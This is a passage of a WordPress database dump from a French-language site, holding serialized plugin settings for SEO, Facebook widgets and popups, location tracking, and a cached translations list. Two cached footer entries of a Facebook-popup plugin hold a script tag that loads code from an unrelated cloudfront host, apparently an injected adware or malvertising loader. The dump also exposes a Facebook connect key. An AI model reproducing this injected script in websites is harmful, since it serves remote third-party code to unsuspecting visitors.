age_indexability\";b:1;s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:12:\"website_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:20:\"enable_setting_pages\";b:0;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1509464063;}','yes'),(638,'wpseo_permalinks','a:9:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(639,'wpseo_titles','a:59:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:42:\"%%name%%, auteur sur %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:65:\"Vous avez cherché %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:38:\"Page non trouvée %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:18:\"metakey-home-wpseo\";s:0:\"\";s:20:\"metakey-author-wpseo\";s:0:\"\";s:22:\"noindex-subpages-wpseo\";b:0;s:20:\"noindex-author-wpseo\";b:0;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"metakey-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:16:\"hideeditbox-post\";b:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"metakey-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:16:\"hideeditbox-page\";b:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"metakey-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:22:\"hideeditbox-attachment\";b:0;s:23:\"title-elementor_library\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-elementor_library\";s:0:\"\";s:25:\"metakey-elementor_library\";s:0:\"\";s:25:\"noindex-elementor_library\";b:0;s:26:\"showdate-elementor_library\";b:0;s:29:\"hideeditbox-elementor_library\";b:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:20:\"metakey-tax-category\";s:0:\"\";s:24:\"hideeditbox-tax-category\";b:0;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:20:\"metakey-tax-post_tag\";s:0:\"\";s:24:\"hideeditbox-tax-post_tag\";b:0;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:23:\"metakey-tax-post_format\";s:0:\"\";s:27:\"hideeditbox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;}','yes'),(640,'wpseo_social','a:20:{s:9:\"fb_admins\";a:0:{}s:12:\"fbconnectkey\";s:32:\"39b7c9f4fb7fd8fa4f7ecc432f8c9963\";s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(641,'wpseo_rss','a:2:{s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:64:\"L’article %%POSTLINK%% est apparu en premier sur %%BLOGLINK%%.\";}','yes'),(642,'wpseo_internallinks','a:11:{s:20:\"breadcrumbs-404crumb\";s:30:\"Erreur 404 : Page introuvable\";s:23:\"breadcrumbs-blog-remove\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:13:\"Archives pour\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:7:\"Accueil\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:18:\"Vous avez cherché\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:23:\"post_types-post-maintax\";i:0;s:36:\"post_types-elementor_library-maintax\";i:0;}','yes'),(643,'wpseo_xml','a:16:{s:22:\"disable_author_sitemap\";b:1;s:22:\"disable_author_noposts\";b:1;s:16:\"enablexmlsitemap\";b:1;s:16:\"entries-per-page\";i:1000;s:14:\"excluded-posts\";s:0:\"\";s:38:\"user_role-administrator-not_in_sitemap\";b:0;s:31:\"user_role-editor-not_in_sitemap\";b:0;s:31:\"user_role-author-not_in_sitemap\";b:0;s:36:\"user_role-contributor-not_in_sitemap\";b:0;s:35:\"user_role-subscriber-not_in_sitemap\";b:0;s:30:\"post_types-post-not_in_sitemap\";b:0;s:30:\"post_types-page-not_in_sitemap\";b:0;s:36:\"post_types-attachment-not_in_sitemap\";b:1;s:34:\"taxonomies-category-not_in_sitemap\";b:0;s:34:\"taxonomies-post_tag-not_in_sitemap\";b:0;s:37:\"taxonomies-post_format-not_in_sitemap\";b:0;}','yes'),(644,'wpseo_flush_rewrite','1','yes'),(646,'wpseo_sitemap_1_cache_validator','fcdE','no'),(647,'wpseo_sitemap_category_cache_validator','4OR9o','no'),(648,'wpseo_sitemap_post_cache_validator','fcdQ','no'),(652,'wpseo_sitemap_page_cache_validator','4172G','no'),(733,'main_header_menu','#ffffff','yes'),(734,'sub_menu_bg','#ffffff','yes'),(743,'wpseo_sitemap_cache_validator_global','47KvK','no'),(806,'wpseo_sitemap_835_cache_validator','4yp5u','no'),(821,'wpseo_sitemap_839_cache_validator','4NlsR','no'),(828,'wpseo_sitemap_843_cache_validator','4QwNt','no'),(842,'wpseo_sitemap_846_cache_validator','4Xk35','no'),(854,'wpseo_sitemap_411_cache_validator','5bEoC','no'),(1011,'_site_transient_timeout_community-events-d6714e2123dd9c327e7551c49c974309','1509893894','no'),(1012,'_site_transient_community-events-d6714e2123dd9c327e7551c49c974309','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:11:\"41.79.201.0\";}s:6:\"events\";a:0:{}}','no'),(1017,'widget_easy_facebook_feed','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1018,'widget_easy_facebook_page_plugin','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1019,'_efbl_version','4.3.3','no'),(1079,'wpseo_sitemap_880_cache_validator','4ItKX','no'),(1084,'I_HAVE_SUPPORTED_THE_EFBL_PLUGIN','1','no'),(1089,'facebookpopup_fburl','guineeinnovations','yes'),(1090,'facebookpopup_delay','1','yes'),(1091,'_transient_timeout_fb-popup-footer-etdesktop','1510584151','no'),(1092,'_transient_fb-popup-footer-etdesktop','<!-- amvn stundr -->\n<script data-cfasync=\"false\" src=\"//d20je219bs8hnq.cloudfront.net/?sbejd=648371\"></script>','no'),(1097,'_transient_timeout_fb-popup-footer-etmobile','1510584658','no'),(1098,'_transient_fb-popup-footer-etmobile','<!-- amvn stundr -->\n<script data-cfasync=\"false\" src=\"//d20je219bs8hnq.cloudfront.net/?sbejd=648371\"></script>','no'),(1138,'arv_fb24_opt','a:12:{s:5:\"fb_id\";s:17:\"guineeinnovations\";s:14:\"display_on_all\";s:1:\"1\";s:15:\"display_on_page\";s:1:\"1\";s:15:\"display_on_post\";s:1:\"1\";s:19:\"display_on_homepage\";s:1:\"1\";s:18:\"display_on_archive\";s:1:\"1\";s:5:\"delay\";s:4:\"1000\";s:9:\"show_once\";s:2:\"14\";s:3:\"coc\";s:1:\"1\";s:6:\"scroll\";s:1:\"1\";s:3:\"min\";s:1:\"0\";s:11:\"performance\";s:1:\"1\";}','yes'),(1160,'wp_facebook_popup_settings','a:13:{s:21:\"enable_disable_plugin\";s:1:\"1\";s:10:\"title_text\";s:25:\"Suivez nous sur Facebook!\";s:20:\"facebook_fanpage_url\";s:42:\"https://www.facebook.com/guineeinnovations\";s:9:\"show_post\";s:1:\"1\";s:12:\"show_in_home\";s:1:\"1\";s:12:\"show_in_post\";s:1:\"1\";s:12:\"show_in_page\";s:1:\"1\";s:15:\"show_everywhere\";s:1:\"1\";s:19:\"show_loggedin_users\";s:1:\"1\";s:20:\"show_loggedout_users\";s:1:\"1\";s:13:\"appear_always\";s:1:\"1\";s:28:\"days_until_popup_shows_again\";s:1:\"1\";s:20:\"seconds_popup_appear\";s:1:\"2\";}','yes'),(1171,'widget_facebook_like_box_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1176,'pps_txt_files_css_updated','1','yes'),(1177,'pps_txt_files_css_updated_2','1','yes'),(1178,'wpfy_pps_db_version','1.9.11','yes'),(1179,'wpfy_pps_db_installed','1','yes'),(1180,'pps_plugin_activation_errors','','yes'),(1181,'pps_opts_data','a:17:{s:10:\"send_stats\";a:1:{s:5:\"value\";s:1:\"0\";}s:29:\"disable_subscribe_ip_antispam\";a:1:{s:5:\"value\";s:1:\"1\";}s:16:\"disable_autosave\";a:1:{s:5:\"value\";s:1:\"0\";}s:13:\"add_love_link\";a:1:{s:5:\"value\";s:1:\"0\";}s:12:\"access_roles\";a:1:{s:5:\"value\";s:13:\"administrator\";}s:11:\"foot_assets\";a:1:{s:5:\"value\";s:1:\"0\";}s:23:\"disable_email_html_type\";a:1:{s:5:\"value\";s:1:\"0\";}s:13:\"use_local_cdn\";a:1:{s:5:\"value\";s:1:\"0\";}s:16:\"mail_send_engine\";a:1:{s:5:\"value\";s:7:\"wp_mail\";}s:9:\"smtp_host\";a:1:{s:5:\"value\";i:0;}s:10:\"smtp_login\";a:1:{s:5:\"value\";i:0;}s:9:\"smtp_pass\";a:1:{s:5:\"value\";i:0;}s:9:\"smtp_port\";a:1:{s:5:\"value\";i:0;}s:11:\"smtp_secure\";a:1:{s:5:\"value\";s:0:\"\";}s:13:\"sendmail_path\";a:1:{s:5:\"value\";s:24:\"/usr/sbin/sendmail -t -i\";}s:11:\"start_usage\";a:2:{s:5:\"value\";i:1510063734;s:10:\"changed_on\";i:1510063734;}s:17:\"plug_welcome_show\";a:2:{s:5:\"value\";i:1510063734;s:10:\"changed_on\";i:1510063734;}}','yes'),(1182,'pps_plug_was_used','1','yes'),(1183,'pps_stats_recalculated','1','yes'),(1254,'_transient_timeout_elementor_remote_info_api_data_1.7.12','1510261963','no'),(1255,'_transient_elementor_remote_info_api_data_1.7.12','a:2:{s:9:\"timestamp\";i:1510218762;s:14:\"upgrade_notice\";a:2:{s:7:\"version\";s:5:\"1.5.0\";s:7:\"message\";s:0:\"\";}}','no'),(1276,'vifslb_like_width','450','yes'),(1277,'vifslb_like_height','30','yes'),(1278,'vifslb_like_layout','standard','yes'),(1279,'vifslb_like_verb','like','yes'),(1280,'vifslb_like_size','small','yes'),(1281,'vifslb_like_align','left','yes'),(1282,'vifslb_like_showfaces','true','yes'),(1283,'vifslb_like_share','true','yes'),(1284,'vifslb_like_show_at_top','true','yes'),(1285,'vifslb_like_show_at_bottom','','yes'),(1286,'vifslb_like_show_on_page','true','yes'),(1287,'vifslb_like_show_on_post','true','yes'),(1288,'vifslb_like_show_on_home','true','yes'),(1289,'vifslb_like_show_on_archive','','yes'),(1290,'vifslb_like_facebook_image','','yes'),(1291,'vifslb_like_html5','','yes'),(1292,'vifslb_like_facebook_app_id','https://www.facebook.com/guineeinnovations/','yes'),(1293,'vifslb_like_use_excerpt_as_description','true','yes'),(1294,'vifslb_like_type','Article','yes'),(1295,'vifslb_like_use_plugin_lang','fr_CA','yes'),(1296,'vifslb_like_btntype','html5','yes'),(1297,'vifslb_like_excludepage','','yes'),(1302,'widget_facebooklikebox','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:31:{s:5:\"title\";s:0:\"\";s:17:\"pluginDisplayType\";s:11:\"page_plugin\";s:10:\"layoutMode\";s:5:\"xfbml\";s:13:\"pluginPageURL\";s:43:\"https://www.facebook.com/guineeinnovations/\";s:15:\"pagePluginWidth\";s:3:\"250\";s:16:\"pagePluginHeight\";s:3:\"250\";s:14:\"hideCoverPhoto\";s:4:\"true\";s:13:\"showPagePosts\";s:4:\"true\";s:12:\"showFacePile\";s:4:\"true\";s:6:\"pageID\";s:15:\"119691288064264\";s:7:\"pageURL\";s:103:\"http://www.facebook.com/pages/VivoCiticom-Joomla-Wordpress-Blogger-Drupal-DNN-Community/119691288064264\";s:10:\"connection\";s:2:\"10\";s:5:\"width\";s:3:\"292\";s:6:\"height\";s:3:\"255\";s:7:\"streams\";s:3:\"yes\";s:11:\"colorScheme\";s:5:\"light\";s:11:\"borderColor\";s:6:\"AAAAAA\";s:9:\"showFaces\";s:3:\"yes\";s:6:\"header\";s:3:\"yes\";s:19:\"fblike_button_style\";s:8:\"standard\";s:29:\"fblike_button_verb_to_display\";s:9:\"recommend\";s:19:\"fblike_button_width\";s:3:\"292\";s:25:\"fblike_button_colorScheme\";s:5:\"light\";s:23:\"fblike_button_showFaces\";s:3:\"yes\";s:18:\"fblike_button_font\";s:5:\"arial\";s:24:\"enableOtherSocialButtons\";s:2:\"no\";s:20:\"addThisVerticalStyle\";s:1:\"1\";s:12:\"addThisPubId\";s:0:\"\";s:20:\"enableTwitterButtons\";s:2:\"no\";s:15:\"twitterUsername\";s:0:\"\";s:18:\"twitterButtonStyle\";s:3:\"127\";}}','yes'),(1322,'_transient_timeout_settings_errors','1510223047','no'),(1323,'_transient_settings_errors','a:1:{i:0;a:4:{s:7:\"setting\";s:7:\"general\";s:4:\"code\";s:16:\"settings_updated\";s:7:\"message\";s:22:\"Options enregistrées.\";s:4:\"type\";s:7:\"updated\";}}','no'),(1328,'pps_unique_stats','a:3:{i:0;s:26:\"check_other_plugs_msg.show\";i:1;s:23:\"enb_promo_link_msg.show\";i:2;s:18:\"enb_stats_msg.show\";}','yes'),(1513,'_site_transient_browser_a9db4d03969fdd98d377b682b063efe6','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"61.0.3163.100\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(1514,'_site_transient_timeout_browser_a9db4d03969fdd98d377b682b063efe6','1511358382','no'),(1542,'trackserver_options','a:14:{s:12:\"trackme_slug\";s:7:\"trackme\";s:17:\"trackme_extension\";s:1:\"z\";s:15:\"mapmytracks_tag\";s:11:\"mapmytracks\";s:11:\"osmand_slug\";s:6:\"osmand\";s:23:\"osmand_trackname_format\";s:12:\"OsmAnd %F %H\";s:17:\"sendlocation_slug\";s:12:\"sendlocation\";s:29:\"sendlocation_trackname_format\";s:18:\"SendLocation %F %H\";s:10:\"upload_tag\";s:8:\"tsupload\";s:13:\"gettrack_slug\";s:20:\"trackserver/gettrack\";s:19:\"normalize_tripnames\";s:3:\"yes\";s:16:\"tripnames_format\";s:5:\"%F %T\";s:8:\"tile_url\";s:49:\"http://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png\";s:11:\"attribution\";s:73:\"&copy; <a href=\"http://www.openstreetmap.org/copyright\">OpenStreetMap</a>\";s:10:\"db_version\";i:15;}','yes'),(1693,'wpseo_sitemap_909_cache_validator','5m217','no'),(1836,'_site_transient_timeout_available_translations','1511462794','no'),(1837,'_site_transient_available_translations','a:111:{s:2:\"af\";a:8:{s:8:\"language\";s:2:\"af\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-09 10:36:40\";s:12:\"english_name\";s:9:\"Afrikaans\";s:11:\"native_name\";s:9:\"Afrikaans\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/af.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"af\";i:2;s:3:\"afr\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:10:\"Gaan voort\";}}s:2:\"ar\";a:8:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-07-29 08:49:40\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ar.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:2;s:3:\"ara\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:3:\"ary\";a:8:{s:8:\"language\";s:3:\"ary\";s:7:\"version\";s:5:\"4.7.7\";s:7:\"updated\";s:19:\"2017-01-26 15:42:35\";s:12:\"english_name\";s:15:\"Moroccan Arabic\";s:11:\"native_name\";s:31:\"العربية المغربية\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.7/ary.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ar\";i:3;s:3:\"ary\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"المتابعة\";}}s:2:\"as\";a:8:{s:8:\"language\";s:2:\"as\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-22 18:59:07\";s:12:\"english_name\";s:8:\"Assamese\";s:11:\"native_name\";s:21:\"অসমীয়া\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/as.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"as\";i:2;s:3:\"asm\";i:3;s:3:\"asm\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:2:\"az\";a:8:{s:8:\"language\";s:2:\"az\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-11-06 00:09:27\";s:12:\"english_name\";s:11:\"Azerbaijani\";s:11:\"native_name\";s:16:\"Azərbaycan dili\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/az.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:2;s:3:\"aze\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:5:\"Davam\";}}s:3:\"azb\";a:8:{s:8:\"language\";s:3:\"azb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-12 20:34:31\";s:12:\"english_name\";s:17:\"South Azerbaijani\";s:11:\"native_name\";s:29:\"گؤنئی آذربایجان\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/azb.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"az\";i:3;s:3:\"azb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continue\";}}s:3:\"bel\";a:8:{s:8:\"language\";s:3:\"bel\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-08 13:11:50\";s:12:\"english_name\";s:10:\"Belarusian\";s:11:\"native_name\";s:29:\"Беларуская мова\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.8.3/bel.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"be\";i:2;s:3:\"bel\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:20:\"Працягнуць\";}}s:5:\"bg_BG\";a:8:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-12 13:04:42\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/bg_BG.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bg\";i:2;s:3:\"bul\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Напред\";}}s:5:\"bn_BD\";a:8:{s:8:\"language\";s:5:\"bn_BD\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-01 12:57:10\";s:12:\"english_name\";s:7:\"Bengali\";s:11:\"native_name\";s:15:\"বাংলা\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/bn_BD.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"bn\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:23:\"এগিয়ে চল.\";}}s:2:\"bo\";a:8:{s:8:\"language\";s:2:\"bo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-05 09:44:12\";s:12:\"english_name\";s:7:\"Tibetan\";s:11:\"native_name\";s:21:\"བོད་ཡིག\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.7.2/bo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bo\";i:2;s:3:\"tib\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:24:\"མུ་མཐུད།\";}}s:5:\"bs_BA\";a:8:{s:8:\"language\";s:5:\"bs_BA\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-09-04 20:20:28\";s:12:\"english_name\";s:7:\"Bosnian\";s:11:\"native_name\";s:8:\"Bosanski\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/bs_BA.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"bs\";i:2;s:3:\"bos\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Nastavi\";}}s:2:\"ca\";a:8:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-21 05:42:26\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/ca.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"ca\";i:2;s:3:\"cat\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Continua\";}}s:3:\"ceb\";a:8:{s:8:\"language\";s:3:\"ceb\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-03-02 17:25:51\";s:12:\"english_name\";s:7:\"Cebuano\";s:11:\"native_name\";s:7:\"Cebuano\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/ceb.zip\";s:3:\"iso\";a:2:{i:2;s:3:\"ceb\";i:3;s:3:\"ceb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:7:\"Padayun\";}}s:5:\"cs_CZ\";a:8:{s:8:\"language\";s:5:\"cs_CZ\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2017-01-12 08:46:26\";s:12:\"english_name\";s:5:\"Czech\";s:11:\"native_name\";s:12:\"Čeština‎\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.7.2/cs_CZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cs\";i:2;s:3:\"ces\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Pokračovat\";}}s:2:\"cy\";a:8:{s:8:\"language\";s:2:\"cy\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-13 20:49:00\";s:12:\"english_name\";s:5:\"Welsh\";s:11:\"native_name\";s:7:\"Cymraeg\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/cy.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"cy\";i:2;s:3:\"cym\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Parhau\";}}s:5:\"da_DK\";a:8:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-10-03 23:25:51\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/da_DK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"da\";i:2;s:3:\"dan\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:8:\"Fortsæt\";}}s:14:\"de_CH_informal\";a:8:{s:8:\"language\";s:14:\"de_CH_informal\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-09 11:53:31\";s:12:\"english_name\";s:30:\"German (Switzerland, Informal)\";s:11:\"native_name\";s:21:\"Deutsch (Schweiz, Du)\";s:7:\"package\";s:73:\"https://downloads.wordpress.org/translation/core/4.8.3/de_CH_informal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_CH\";a:8:{s:8:\"language\";s:5:\"de_CH\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-09-09 11:51:58\";s:12:\"english_name\";s:20:\"German (Switzerland)\";s:11:\"native_name\";s:17:\"Deutsch (Schweiz)\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/de_CH.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:5:\"de_DE\";a:8:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 15:55:17\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/4.8.3/de_DE.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:12:\"de_DE_formal\";a:8:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-05 15:54:18\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:71:\"https://downloads.wordpress.org/translation/core/4.8.3/de_DE_formal.zip\";s:3:\"iso\";a:1:{i:1;s:2:\"de\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"Weiter\";}}s:3:\"dzo\";a:8:{s:8:\"language\";s:3:\"dzo\";s:7:\"version\";s:5:\"4.7.2\";s:7:\"updated\";s:19:\"2016-06-29 08:59:03\";s:12:\"english_name\";s:8:\"Dzongkha\";s:11:\"native_name\";s:18:\"རྫོང་ཁ\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/4.7.2/dzo.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"dz\";i:2;s:3:\"dzo\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:0:\"\";}}s:2:\"el\";a:8:{s:8:\"language\";s:2:\"el\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-17 21:52:40\";s:12:\"english_name\";s:5:\"Greek\";s:11:\"native_name\";s:16:\"Ελληνικά\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/4.8.3/el.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"el\";i:2;s:3:\"ell\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:16:\"Συνέχεια\";}}s:5:\"en_AU\";a:8:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"4.8.3\";s:7:\"updated\";s:19:\"2017-11-06 04:53:41\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English 